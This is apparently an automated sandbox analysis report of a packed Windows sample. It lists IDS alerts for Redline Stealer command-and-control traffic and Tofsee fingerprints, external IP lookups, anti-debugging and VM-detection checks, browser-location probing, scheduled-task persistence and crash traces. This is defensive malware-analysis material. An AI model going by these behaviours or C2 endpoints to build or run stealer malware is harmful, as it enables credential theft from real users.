TCP 185.225.73.32:44973 -> 192.168.56.101:49269	2046106	ET MALWARE Redline Stealer TCP CnC Activity - MSValue (Response)	A Network Trojan was detected
TCP 192.168.56.101:49281 -> 87.240.129.133:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49281 -> 87.240.129.133:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49294 -> 87.240.129.133:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49294 -> 87.240.129.133:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49298 -> 95.142.206.1:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 141.95.126.89:443 -> 192.168.56.101:49212	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 141.95.126.89:443 -> 192.168.56.101:49212	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49174 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49277 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49267 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49187 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49166 77.88.55.60:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign ECC OV SSL CA 2018	C=RU, ST=Moscow, L=Moscow, O=Yandex LLC, CN=*.xn--d1acpjx3f.xn--p1ai	e4:ba:b2:7f:bf:93:b8:22:10:26:70:37:9c:03:1a:9d:fb:23:17:24
TLSv1 192.168.56.101:49177 104.26.5.15:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5
TLSv1 192.168.56.101:49167 62.217.160.2:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign RSA OV SSL CA 2018	C=RU, ST=Moscow, L=Moscow, O=VK LLC, CN=*.dzen.ru	6a:31:14:29:60:07:c9:c6:17:7b:d1:27:ad:53:57:ec:d8:c1:d8:d2
TLSv1 192.168.56.101:49176 104.26.5.15:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5
TLSv1 192.168.56.101:49168 213.180.204.24:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign RSA OV SSL CA 2018	C=RU, ST=Moscow, L=Moscow, O=Yandex LLC, CN=sso.passport.yandex.ru	f0:52:26:54:41:65:2b:6a:37:7b:c1:5b:de:9c:e9:d4:41:c6:81:2d
TLSv1 192.168.56.101:49171 172.67.193.129:443	C=US, O=Let's Encrypt, CN=E1	CN=ironhost.io	1f:0b:7a:47:6b:7f:71:b9:9c:82:0e:4f:f5:e8:7c:05:28:03:e7:8e
TLSv1 192.168.56.101:49193 93.186.225.194:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2	C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com	6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09
TLSv1 192.168.56.101:49207 172.67.197.101:443	C=US, O=Let's Encrypt, CN=E1	CN=preconcert.pw	60:b2:a3:3e:2f:80:57:cd:6f:c1:a3:e9:b3:c6:cb:95:41:83:4a:64
TLSv1 192.168.56.101:49205 104.21.59.53:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1P5	CN=sergejbukotko.com	f1:9c:9e:67:d8:1b:22:61:4a:4d:a0:fc:b3:45:84:76:9e:9d:2d:27
TLSv1 192.168.56.101:49240 95.142.206.3:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2	C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.userapi.com	bc:a9:84:5f:86:90:b1:02:ba:2d:66:e8:e5:46:c1:57:e9:c0:cc:24
TLSv1 192.168.56.101:49239 93.186.225.194:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2	C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com	6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09
TLSv1 192.168.56.101:49249 95.142.206.1:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2	C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.userapi.com	bc:a9:84:5f:86:90:b1:02:ba:2d:66:e8:e5:46:c1:57:e9:c0:cc:24
TLSv1 192.168.56.101:49231 93.186.225.194:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2	C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com	6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09
TLSv1 192.168.56.101:49243 93.186.225.194:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2	C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com	6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09
TLSv1 192.168.56.101:49248 93.186.225.194:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2	C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com	6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09
TLSv1 192.168.56.101:49186 172.67.75.163:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	92:b4:ed:98:67:d9:db:8a:1e:bd:0e:fe:7f:22:45:e9:79:b5:78:65
TLSv1 192.168.56.101:49238 93.186.225.194:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2	C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com	6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09
TLSv1 192.168.56.101:49242 87.240.137.140:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2	C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.userapi.com	bc:a9:84:5f:86:90:b1:02:ba:2d:66:e8:e5:46:c1:57:e9:c0:cc:24
TLSv1 192.168.56.101:49245 95.142.206.0:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2	C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.userapi.com	bc:a9:84:5f:86:90:b1:02:ba:2d:66:e8:e5:46:c1:57:e9:c0:cc:24
TLSv1 192.168.56.101:49244 93.186.225.194:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2	C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com	6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09
TLSv1 192.168.56.101:49246 87.240.137.140:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2	C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.userapi.com	bc:a9:84:5f:86:90:b1:02:ba:2d:66:e8:e5:46:c1:57:e9:c0:cc:24
TLSv1 192.168.56.101:49280 104.26.5.15:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5
TLSv1 192.168.56.101:49279 172.67.75.166:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5
TLSv1 192.168.56.101:49288 87.240.129.133:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2	C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com	6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09
TLSv1 192.168.56.101:49297 87.240.129.133:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2	C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com	6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09
TLSv1 192.168.56.101:49264 104.26.9.59:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	92:b4:ed:98:67:d9:db:8a:1e:bd:0e:fe:7f:22:45:e9:79:b5:78:65
TLSv1 192.168.56.101:49298 95.142.206.1:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2	C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.userapi.com	bc:a9:84:5f:86:90:b1:02:ba:2d:66:e8:e5:46:c1:57:e9:c0:cc:24

Queries for the computername (31 events)

Time & API	Arguments	Status	Return
GetComputerNameW Sept. 6, 2023, 7:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 7:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 7:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 7:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 7:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 7:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 7:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 7:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 7:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 7:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 7:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 7:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 7:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 7:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 7:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 7:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 7:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 7:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 7:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 7:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 7:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 7:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 7:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 7:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 7:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 7:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 7:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 7:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 7:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 7:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 7:41 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (7 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 6, 2023, 7:41 a.m.			0	0
IsDebuggerPresent Sept. 6, 2023, 7:41 a.m.			0	0
IsDebuggerPresent Sept. 6, 2023, 7:41 a.m.			0	0
IsDebuggerPresent Sept. 6, 2023, 7:41 a.m.			0	0
IsDebuggerPresent Sept. 6, 2023, 7:41 a.m.			0	0
IsDebuggerPresent Sept. 6, 2023, 7:41 a.m.			0	0
IsDebuggerPresent Sept. 6, 2023, 7:41 a.m.			0	0

Command line console output was observed (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW Sept. 6, 2023, 7:39 a.m.	buffer: SUCCESS: The scheduled task "PowerControl HR" has successfully been created. console_handle: 0x00000007	1	1	0
WriteConsoleW Sept. 6, 2023, 7:39 a.m.	buffer: SUCCESS: The scheduled task "PowerControl LG" has successfully been created. console_handle: 0x00000007	1	1	0

Uses Windows APIs to generate a cryptographic key (38 events)

Time & API	Arguments	Status	Return
CryptExportKey Sept. 6, 2023, 7:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053b240 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 7:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053b240 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 7:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053b240 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 7:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053b240 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 7:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053b2c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 7:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053b2c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 7:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053b1c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 7:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053b1c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 7:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053b1c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 7:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053b1c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 7:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053b1c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 7:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053b240 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 7:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053b240 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 7:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053b440 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 7:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076b380 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 7:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076b380 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 7:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076b400 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 7:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0083d6e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 7:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0083cf28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 7:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0083cf28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 7:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0083cf28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 7:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0083cf28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 7:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0083cf28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 7:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0083d2e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 7:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0083d2e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 7:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0083d528 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 7:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fb370 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 7:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fb370 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 7:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fb3f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 7:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fb930 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 7:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fb9b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 7:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fb9b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 7:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fb9b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 7:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fb9b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 7:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fb9b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 7:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fbb30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 7:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fbb30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 7:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fba70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Tries to locate where the browsers are installed (3 events)

file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file	C:\Program Files\Mozilla Firefox\firefox.exe
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 6, 2023, 7:39 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (3 events)

section	.vmp0
section	.vmp1
section	.vmp2

The file contains an unknown PE resource name possibly indicative of a packer (2 events)

resource name	PNG
resource name	None

One or more processes crashed (33 events)

Time & API	Arguments	Status
__exception__ Sept. 6, 2023, 7:39 a.m.	stacktrace: WinHttpCloseHandle-0x3e3 winhttp+0x281e @ 0x741c281e WinHttpCloseHandle-0x30d winhttp+0x28f4 @ 0x741c28f4 WinHttpCloseHandle+0x53 WinHttpSetOption-0x1318 winhttp+0x2c54 @ 0x741c2c54 services+0x2ebe5 @ 0xf2ebe5 services+0x578e @ 0xf0578e services+0x5739 @ 0xf05739 services+0x699a @ 0xf0699a services+0xe696 @ 0xf0e696 services+0x38373 @ 0xf38373 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 81 79 24 41 41 41 41 0f 85 b4 0d 00 00 83 65 e4 exception.instruction: cmp dword ptr [ecx + 0x24], 0x41414141 exception.exception_code: 0xc0000005 exception.symbol: WinHttpCloseHandle-0x4ae winhttp+0x2753 exception.address: 0x741c2753 registers.esp: 2939952 registers.edi: 132 registers.eax: 2939980 registers.ebp: 2939996 registers.edx: 2941156 registers.ebx: 132 registers.esi: 0 registers.ecx: 132	1
__exception__ Sept. 6, 2023, 7:39 a.m.	stacktrace: WinHttpCloseHandle-0x3e3 winhttp+0x281e @ 0x741c281e WinHttpCloseHandle+0x79 WinHttpSetOption-0x12f2 winhttp+0x2c7a @ 0x741c2c7a services+0x2ebe5 @ 0xf2ebe5 services+0x578e @ 0xf0578e services+0x5739 @ 0xf05739 services+0x699a @ 0xf0699a services+0xe696 @ 0xf0e696 services+0x38373 @ 0xf38373 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 81 79 24 41 41 41 41 0f 85 b4 0d 00 00 83 65 e4 exception.instruction: cmp dword ptr [ecx + 0x24], 0x41414141 exception.exception_code: 0xc0000005 exception.symbol: WinHttpCloseHandle-0x4ae winhttp+0x2753 exception.address: 0x741c2753 registers.esp: 2941056 registers.edi: 132 registers.eax: 2941084 registers.ebp: 2941100 registers.edx: 0 registers.ebx: 132 registers.esi: 0 registers.ecx: 132	1
__exception__ Sept. 6, 2023, 7:39 a.m.	stacktrace: WinHttpCloseHandle-0x3e3 winhttp+0x281e @ 0x741c281e WinHttpCloseHandle-0x30d winhttp+0x28f4 @ 0x741c28f4 WinHttpCloseHandle+0x53 WinHttpSetOption-0x1318 winhttp+0x2c54 @ 0x741c2c54 services+0x2ebe5 @ 0xf2ebe5 services+0x578e @ 0xf0578e services+0x5739 @ 0xf05739 services+0x699a @ 0xf0699a services+0xe696 @ 0xf0e696 services+0x38373 @ 0xf38373 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 81 79 24 41 41 41 41 0f 85 b4 0d 00 00 83 65 e4 exception.instruction: cmp dword ptr [ecx + 0x24], 0x41414141 exception.exception_code: 0xc0000005 exception.symbol: WinHttpCloseHandle-0x4ae winhttp+0x2753 exception.address: 0x741c2753 registers.esp: 2939952 registers.edi: 132 registers.eax: 2939980 registers.ebp: 2939996 registers.edx: 2941156 registers.ebx: 132 registers.esi: 0 registers.ecx: 132	1
__exception__ Sept. 6, 2023, 7:39 a.m.	stacktrace: WinHttpCloseHandle-0x3e3 winhttp+0x281e @ 0x741c281e WinHttpCloseHandle+0x79 WinHttpSetOption-0x12f2 winhttp+0x2c7a @ 0x741c2c7a services+0x2ebe5 @ 0xf2ebe5 services+0x578e @ 0xf0578e services+0x5739 @ 0xf05739 services+0x699a @ 0xf0699a services+0xe696 @ 0xf0e696 services+0x38373 @ 0xf38373 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 81 79 24 41 41 41 41 0f 85 b4 0d 00 00 83 65 e4 exception.instruction: cmp dword ptr [ecx + 0x24], 0x41414141 exception.exception_code: 0xc0000005 exception.symbol: WinHttpCloseHandle-0x4ae winhttp+0x2753 exception.address: 0x741c2753 registers.esp: 2941056 registers.edi: 132 registers.eax: 2941084 registers.ebp: 2941100 registers.edx: 0 registers.ebx: 132 registers.esi: 0 registers.ecx: 132	1
__exception__ Sept. 6, 2023, 7:41 a.m.	stacktrace: 0xb59841 0xb59643 0xb57710 0xb56f0b 0xb53c6b 0xb535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72072652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7208264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72082e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x721374ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72137610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x721c1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x721c1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x721c1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x721c416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727cf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72847f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72844de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xb59978 registers.esp: 1370420 registers.edi: 1370472 registers.eax: 0 registers.ebp: 1370484 registers.edx: 5541800 registers.ebx: 1371916 registers.esi: 38117592 registers.ecx: 0	1
